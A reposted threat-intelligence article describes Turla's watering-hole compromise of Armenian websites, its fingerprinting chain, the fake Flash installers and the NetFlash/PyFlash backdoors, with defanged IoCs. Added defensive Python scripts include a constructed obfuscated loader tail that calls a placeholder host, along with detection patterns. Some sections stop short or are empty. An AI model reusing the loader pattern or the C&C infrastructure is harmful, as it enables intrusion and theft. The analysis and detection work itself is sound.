2025-03-29 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
I would like to share with you how Turla uses watering-hole attacks to implant a backdoor. I believe most people don't know much about it, so I am sharing this article for your reference. I hope you will learn a lot after reading it. Let's learn about it together.
For learning and reference only
Target websites
Turla compromised at least four Armenian websites, including two government sites, so the targets likely include government officials and politicians. The following websites were compromised:
armconsul[.]ru: Consular Office of the Embassy of Armenia in Russia
mnp.nkr[.]am: Ministry of Nature Conservation and Natural Resources of the Republic of Artsakh
aiisa[.]am: Armenian Institute of International and Security Affairs
adgf[.]am: Armenian Deposit Guarantee Fund
These sites had been compromised since at least early 2019. Turla used this unauthorized access to insert malicious JavaScript code into the websites. For example, on mnp.nkr[.]am, obfuscated code was appended to the end of jquery-migrate.min.js (a common JavaScript library), as shown in figure 1:
The appended code downloads an additional JavaScript script from skategirlchina[.]com/wp-includes/data_from_db_top.php. Since November 2019 the site has been observed to no longer distribute the malicious script, and Turla appears to have suspended this activity.
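The tampering described above, obfuscated code appended to the end of an otherwise legitimate library file, is something a site owner can detect with a simple integrity check. The following Python is an added example, not code from the article or from the researchers: it compares a served copy of a library against a known-good copy, distinguishes "appended" (known-good content is an exact prefix) from "modified", and reports loader-style indicators found in the appended tail. The library text, the tampered tail and the host c2.example.invalid are all constructed for the example; the real jquery-migrate.min.js and its hash are not reproduced here.

```python
import hashlib
import re

# Constructed stand-in for the legitimate library (not the real
# jquery-migrate.min.js). In practice the known-good copy and its hash come
# from the vendor release or from the site's own version control.
KNOWN_GOOD_LIBRARY = (
    '/*! jQuery Migrate (constructed stand-in for the real library) */\n'
    '(function(jQuery,window){"use strict";jQuery.migrateVersion="x.y.z";})(jQuery,window);\n'
)
KNOWN_GOOD_SHA256 = hashlib.sha256(KNOWN_GOOD_LIBRARY.encode()).hexdigest()

# Constructed tampered copy: the legitimate content with an obfuscated-looking
# loader appended. The tail is inert and points at a placeholder host.
TAMPERED_LIBRARY = KNOWN_GOOD_LIBRARY + (
    'var _0x4f2a=["\\x73\\x72\\x63","\\x68\\x74\\x74\\x70\\x73"];'
    'eval(String.fromCharCode(118,97,114));'
    'document.createElement("script").setAttribute(_0x4f2a[0],"https://c2.example.invalid/x.js");\n'
)

# Tokens typical of appended loader tails. A hit inside an appended tail is a
# strong signal; the same token inside the library body alone is not.
SUSPICIOUS_TOKENS = ('eval(', 'String.fromCharCode', 'unescape(', '\\x', 'createElement("script")')
HEX_IDENTIFIER_RE = re.compile(r'_0x[0-9a-fA-F]{3,}')


def suspicious_indicators(code: str) -> list:
    """Return the obfuscation/loader indicators present in a piece of JavaScript."""
    found = [tok for tok in SUSPICIOUS_TOKENS if tok in code]
    # Hex-named identifiers (var _0xabcd=[...]) are a common obfuscator artifact.
    if HEX_IDENTIFIER_RE.search(code):
        found.append('hex-named identifier')
    return found


def check_library(current: str, known_good: str, known_good_sha256: str) -> dict:
    """Classify a served copy of a library against the known-good copy.

    status is "clean" (hash matches), "appended" (the known-good content is an
    exact prefix and extra code follows it) or "modified" (anything else).
    """
    if hashlib.sha256(current.encode()).hexdigest() == known_good_sha256:
        return {'status': 'clean', 'tail': '', 'indicators': []}
    if current.startswith(known_good):
        tail = current[len(known_good):]
        return {'status': 'appended', 'tail': tail, 'indicators': suspicious_indicators(tail)}
    return {'status': 'modified', 'tail': '', 'indicators': []}


if __name__ == '__main__':
    for name, body in (('clean copy', KNOWN_GOOD_LIBRARY), ('served copy', TAMPERED_LIBRARY)):
        report = check_library(body, KNOWN_GOOD_LIBRARY, KNOWN_GOOD_SHA256)
        print(f"{name}: {report['status']}", report['indicators'])
```

The hash comparison alone already catches the change; the prefix test is what tells an operator that the legitimate library is intact and the problem is an appended tail, which is exactly the pattern described for mnp.nkr[.]am and is worth reviewing by hand rather than simply overwriting.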
User fingerprinting and communication chain
After a visit to an infected page, skategirlchina[.]com delivers the second-stage malicious JavaScript, which fingerprints the visitor's browser. Figure 2 shows the main functions of this script.
If this is the first time the user's browser executes the script, it adds an evercookie whose value is a random MD5 hash supplied by the server, different on each execution. The evercookie implementation is based on code from GitHub. It stores the cookie value in multiple storage locations (such as the local database, Flash cookies and Silverlight storage), which makes it more persistent than a regular cookie: simply deleting the browser's cookies does not remove it.
The evercookie is used to recognise returning visitors: on a second visit, the previously stored MD5 value identifies the browser as one that has been seen before.
The script also collects the list of browser plug-ins, the screen resolution and various operating system details, and sends them by POST to the C&C server. Any reply is treated as JavaScript code and executed with the eval function.
If the attackers are interested in the infected visitor, the server replies with a piece of JavaScript code. In this campaign, Turla was interested in only a very limited number of the site's visitors. The user is then shown a fake Adobe Flash update warning, as in figure 3, to induce them to download a malicious Flash installer.
No browser exploitation was observed; the campaign relied solely on social engineering. If the user runs the executable manually, both the Turla malware and a legitimate Adobe Flash program are installed. Figure 4 shows the delivery of the malicious payload, from the initial visit to the compromised Armenian website onwards.
Malware
Once the user runs the fake installer, it executes both the Turla malware and a legitimate Adobe Flash installer, so the user may believe the update warning was genuine.
Skipper
By August 2019, victims received a RAR-SFX containing a legitimate Adobe Flash v14 installer and a second RAR-SFX. The latter contains the various components of the Skipper backdoor. The most recent version was documented by Telsy in May 2019.
The C&C server used by Skipper's communication module is the same server that hosts the remote JavaScript and the malicious files: skategirlchina[.]com/wp-includes/ms-locale.php.
NetFlash and PyFlash
A new malicious payload was found at the end of August 2019. It is a .NET program that drops an Adobe Flash v32 installer at %TEMP%\adobe.exe and NetFlash, a .NET downloader, at %TEMP%\winhost.exe. According to their compilation timestamps, the malicious samples were compiled at the end of August and in early September 2019.
NetFlash downloads the second-stage malware from a hard-coded URL and establishes persistence with a Windows scheduled task. Figure 5 shows the NetFlash routine that downloads the second-stage malware, called PyFlash. Another NetFlash sample, compiled at the end of August 2019, was also found with a different hard-coded C&C server: 134.209.222[.]206:15363.
The second-stage backdoor is a py2exe executable. py2exe is a Python extension that converts Python scripts into Windows executables. This is the first time Turla developers have used Python in a backdoor.
The backdoor communicates with a hard-coded C&C server over HTTP. The C&C URL and other parameters, such as the AES key and IV used to encrypt network traffic, are specified at the beginning of the script, as shown in figure 6.
The script's main function (shown in figure 7) sends machine information to the C&C server, together with the output of OS-related commands (systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp).
The C&C server can also send commands to the backdoor in JSON format. The commands are:
1. Download additional files from a given HTTP(S) link.
2. Execute a Windows command using the Python function subprocess32.Popen.
3. Modify the Windows scheduled task so that the malware starts periodically (every X minutes; the default is 5 minutes).
4. Kill (uninstall) the malware. To confirm this command, the malware sends a POST request to the C&C server containing the following string:
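Both NetFlash's persistence (a Windows scheduled task that launches an executable dropped in %TEMP%) and PyFlash's command 3 (re-arming that task to run every X minutes, 5 by default) leave the same artifact: a scheduled task whose action lives in a temp directory and whose trigger repeats at a short interval. The following Python is an added example, not code from the article or from the researchers: it audits task definitions in the XML export format that Task Scheduler produces and flags those two traits. The two task definitions are constructed for the example; the task names, paths and start dates are placeholders, not values from the samples.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definitions in the Task Scheduler XML export format
# (what `schtasks /query /tn <name> /xml` prints). Paths are placeholders,
# not values taken from the samples.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT5M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2019-09-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Local\Temp\winhost.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2019-09-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\updater.exe</Command>
      <Arguments>/quiet</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Actions launched from a user or system temp directory.
TEMP_PATH_RE = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
# ISO 8601 duration as used by <Interval>, e.g. PT5M, PT1H, P1DT2H.
DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
SHORT_INTERVAL_SECONDS = 10 * 60  # beacon-like cadence worth a second look


def iso_duration_seconds(value: str):
    """Convert an ISO 8601 duration such as PT5M to seconds; None if malformed."""
    m = DURATION_RE.match(value.strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def audit_task(xml_text: str) -> dict:
    """Return the task's commands, repetition intervals and a list of findings."""
    root = ET.fromstring(xml_text)
    commands = [(c.text or "").strip() for c in root.findall(".//t:Exec/t:Command", NS)]
    intervals = [(i.text or "").strip() for i in root.findall(".//t:Repetition/t:Interval", NS)]
    findings = []
    for cmd in commands:
        if TEMP_PATH_RE.search(cmd):
            findings.append(f"action runs from a temp directory: {cmd}")
    for iv in intervals:
        secs = iso_duration_seconds(iv)
        if secs is not None and secs <= SHORT_INTERVAL_SECONDS:
            findings.append(f"repeats every {secs // 60} min ({iv})")
    return {"commands": commands, "intervals": intervals, "findings": findings}


if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, audit_task(xml_text)["findings"])
```

Either trait on its own is common in legitimate software (installers do run from temp directories, monitoring agents do repeat every few minutes); the combination, on a task that did not exist before a "Flash update", is what deserves triage.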
Summary
Turla still uses watering-hole attacks as one of its initial access vectors. This campaign relies on social engineering, using fake Adobe Flash update warnings to induce users to download and install malware. The payload, on the other hand, has changed, possibly to evade detection: the dropped component is NetFlash, which installs a backdoor called PyFlash, developed in Python.
IoCs
Websites
http://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js
http://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js
http://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js
adgf[.]am
C&C servers
http://skategirlchina[.]com/wp-includes/data_from_db_top.php
http://skategirlchina[.]com/wp-includes/ms-locale.php
http://37.59.60[.]199/2018/.config/adobe
http://134.209.222[.]206:15363
http://85.222.235[.]156:8000
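The IoC lists above, together with the communication chain described earlier (a visit to a compromised site, then a POST of the browser fingerprint to data_from_db_top.php, then traffic to the malware's C&C), can be turned into a proxy-log sweep. The following Python is an added example, not code from the article or from the researchers: it refangs the published IoCs, matches them against web proxy log lines, labels a POST to the fingerprinting endpoint separately from a plain script load, and reports clients that loaded a compromised site and afterwards contacted a C&C server. The log format and the five log lines are constructed for the example; the IoCs themselves are the ones listed on this page.

```python
import re
from urllib.parse import urlsplit

# IoCs from the report, kept defanged exactly as published.
COMPROMISED_SITE_IOCS = [
    "http://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js",
    "http://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js",
    "http://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js",
    "adgf[.]am",
]
C2_IOCS = [
    "http://skategirlchina[.]com/wp-includes/data_from_db_top.php",
    "http://skategirlchina[.]com/wp-includes/ms-locale.php",
    "http://37.59.60[.]199/2018/.config/adobe",
    "http://134.209.222[.]206:15363",
    "http://85.222.235[.]156:8000",
]


def ioc_key(url: str) -> tuple:
    """Normalise a (possibly defanged) URL to a (host[:port], path) key.
    An IoC with an empty path matches any request to that host:port."""
    url = url.replace("[.]", ".").lower()
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.netloc, parts.path


IOC_INDEX = {}
for _ioc in COMPROMISED_SITE_IOCS:
    IOC_INDEX[ioc_key(_ioc)] = ("compromised-site", _ioc)
for _ioc in C2_IOCS:
    IOC_INDEX[ioc_key(_ioc)] = ("c2", _ioc)

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>".
SAMPLE_LOG = """\
2019-09-02T10:15:01Z 10.0.0.12 GET http://mnp.nkr.am/wp-includes/js/jquery/jquery-migrate.min.js 200
2019-09-02T10:15:02Z 10.0.0.12 GET http://skategirlchina.com/wp-includes/data_from_db_top.php 200
2019-09-02T10:15:03Z 10.0.0.12 POST http://skategirlchina.com/wp-includes/data_from_db_top.php 200
2019-09-02T10:16:40Z 10.0.0.12 GET http://134.209.222.206:15363/ 200
2019-09-02T10:17:00Z 10.0.0.44 GET http://example.org/index.html 200
"""
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def match_line(line: str):
    """Return an alert dict for a log line that touches an IoC, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    netloc, path = ioc_key(url)
    hit = IOC_INDEX.get((netloc, path)) or IOC_INDEX.get((netloc, ""))
    if not hit:
        return None
    category, ioc = hit
    # A POST to the fingerprinting endpoint is the browser reporting its
    # plug-ins, screen and OS data: a stronger signal than loading the script.
    if category == "c2" and method == "POST" and path.endswith("data_from_db_top.php"):
        category = "c2-fingerprint-beacon"
    return {"ts": ts, "client": client, "method": method, "url": url,
            "category": category, "ioc": ioc}


def scan_log(text: str) -> list:
    return [hit for hit in (match_line(line) for line in text.splitlines()) if hit]


def escalated_clients(hits: list) -> set:
    """Clients that loaded a compromised site and later contacted a C&C server."""
    first_site = {}
    escalated = set()
    for h in hits:  # hits are in log order; ISO timestamps sort lexically
        base = h["category"].split("-")[0]
        if base == "compromised":
            first_site.setdefault(h["client"], h["ts"])
        elif base == "c2" and h["client"] in first_site and h["ts"] >= first_site[h["client"]]:
            escalated.add(h["client"])
    return escalated


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["client"], h["method"], h["category"], h["ioc"])
    print("escalated:", sorted(escalated_clients(hits)))
```

A request to one of the compromised sites on its own only means a user visited a legitimate Armenian site while it was backdoored; the follow-up fingerprint POST and any later C&C contact are what single out the handful of visitors Turla chose to serve the fake Flash update to.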
Sample
MITRE ATT&CK techniques
That is all for the article "How Turla uses watering-hole attacks to implant backdoors". Thank you for reading! I hope the content shared here has been helpful; if you want to learn more, follow the industry information channel!